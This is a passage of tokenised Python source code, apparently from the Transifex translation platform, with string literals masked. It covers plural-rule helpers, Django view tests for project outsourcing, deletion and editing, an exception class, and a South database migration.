<EOL> rules . append ( '<STR_LIT>' ) <EOL> if self . rule_two : <EOL> rules . append ( '<STR_LIT>' ) <EOL> if self . rule_few : <EOL> rules . append ( '<STR_LIT>' ) <EOL> if self . rule_many : <EOL> rules . append ( '<STR_LIT>' ) <EOL> rules . append ( '<STR_LIT>' ) <EOL> return rules <EOL> def get_pluralrules_numbers ( self ) : <EOL> rules = [ ] <EOL> if self . rule_zero : <EOL> rules . append ( <NUM_LIT:0> ) <EOL> if self . rule_one : <EOL> rules . append ( <NUM_LIT:1> ) <EOL> if self . rule_two : <EOL> rules . append ( <NUM_LIT:2> ) <EOL> if self . rule_few : <EOL> rules . append ( <NUM_LIT:3> ) <EOL> if self . rule_many : <EOL> rules . append ( <NUM_LIT:4> ) <EOL> rules . append ( <NUM_LIT:5> ) <EOL> return rules </s>
<s> from django . core . urlresolvers import reverse <EOL> from transifex . txcommon . tests import base , utils <EOL> from transifex . projects . models import Project <EOL> class ProjectViewsTests ( base . BaseTestCase , base . NoticeTypes ) : <EOL> def setUp ( self , * args , ** kwargs ) : <EOL> super ( ProjectViewsTests , self ) . setUp ( * args , ** kwargs ) <EOL> self . url_acc = reverse ( '<STR_LIT>' , args = [ self . project . slug ] ) <EOL> def test_project_outsource_good ( self ) : <EOL> """<STR_LIT>""" <EOL> resp = self . client [ '<STR_LIT>' ] . get ( self . url_acc , { } ) <EOL> self . assertContains ( resp , "<STR_LIT>" , status_code = <NUM_LIT:200> ) <EOL> self . assertContains ( resp , "<STR_LIT>" , status_code = <NUM_LIT:200> ) <EOL> def test_project_outsource_bad ( self ) : <EOL> self . assertTrue ( self . user [ '<STR_LIT>' ] not in self . project_private . maintainers . all ( ) ) <EOL> self . project . maintainers . add ( self . user [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( self . user [ '<STR_LIT>' ] in self . project . maintainers . all ( ) ) <EOL> resp = self . client [ '<STR_LIT>' ] . get ( self . url_acc , { } ) <EOL> self . assertContains ( resp , "<STR_LIT>" , status_code = <NUM_LIT:200> ) <EOL> self . assertNotContains ( resp , "<STR_LIT>" , status_code = <NUM_LIT:200> ) <EOL> resp = self . client [ '<STR_LIT>' ] . post ( self . url_acc , { <EOL> '<STR_LIT>' : self . project_private . id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , } ) <EOL> self . assertFalse ( self . project . outsource ) <EOL> self . assertTemplateUsed ( resp , "<STR_LIT>" ) <EOL> self . assertContains ( resp , "<STR_LIT>" ) <EOL> def test_trans_instructions ( self ) : <EOL> """<STR_LIT>""" <EOL> self . project . trans_instructions = "<STR_LIT>" "<STR_LIT>" <EOL> self . project . save ( ) <EOL> resp = self . client [ '<STR_LIT>' ] . get ( self . urls [ '<STR_LIT>' ] ) <EOL> self . assertContains ( resp , "<STR_LIT>" ) <EOL> self . assertContains ( resp , "<STR_LIT>" ) <EOL> def test_delete_project ( self ) : <EOL> url = reverse ( '<STR_LIT>' , args = [ self . project . slug ] ) <EOL> resp = self . client [ '<STR_LIT>' ] . get ( url ) <EOL> self . assertContains ( resp , "<STR_LIT>" ) <EOL> user = self . user [ '<STR_LIT>' ] <EOL> resp = self . client [ '<STR_LIT>' ] . post ( url , { '<STR_LIT:password>' : base . PASSWORD } , follow = True ) <EOL> self . assertContains ( resp , "<STR_LIT>" ) <EOL> self . assertTrue ( Project . objects . filter ( slug = self . project . slug ) . count ( ) == <NUM_LIT:0> ) <EOL> self . assertContains ( resp , "<STR_LIT>" ) <EOL> def test_project_edit ( self ) : <EOL> resp = self . client [ '<STR_LIT>' ] . get ( self . urls [ '<STR_LIT>' ] ) <EOL> self . assertContains ( resp , "<STR_LIT>" , status_code = <NUM_LIT:200> ) <EOL> self . assertContains ( resp , self . project . maintainers . all ( ) [ <NUM_LIT:0> ] ) <EOL> self . assertNotContains ( resp , "<STR_LIT>" ) <EOL> DATA = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' % self . user [ '<STR_LIT>' ] . id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> resp = self . client [ '<STR_LIT>' ] . post ( self . urls [ '<STR_LIT>' ] , DATA , follow = True ) <EOL> self . assertEqual ( resp . status_code , <NUM_LIT:200> ) </s>
<s> """<STR_LIT>""" <EOL> class FormatError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> depends_on = ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ) <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:50> , db_index = True ) ) , <EOL> ( '<STR_LIT:name>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:20> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now_add = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , null = True , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:string>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:32> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:1000> , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:100> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:1000> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = False ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now_add = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:string>' , self . gf ( '<STR_LIT>' ) ( ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:32> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:5> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now_add = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( auto_now = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) , <EOL> ( '<STR_LIT:user>' , self . gf ( '<STR_LIT>' ) ( to = orm [ '<STR_LIT>' ] , null = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = <NUM_LIT:0> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:content>' , self . gf ( '<STR_LIT>' ) ( null = False , blank = False ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( related_name = '<STR_LIT>' , unique = True , to = orm [ '<STR_LIT>' ] ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT:code>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:string>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:content>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:5>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:string>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { 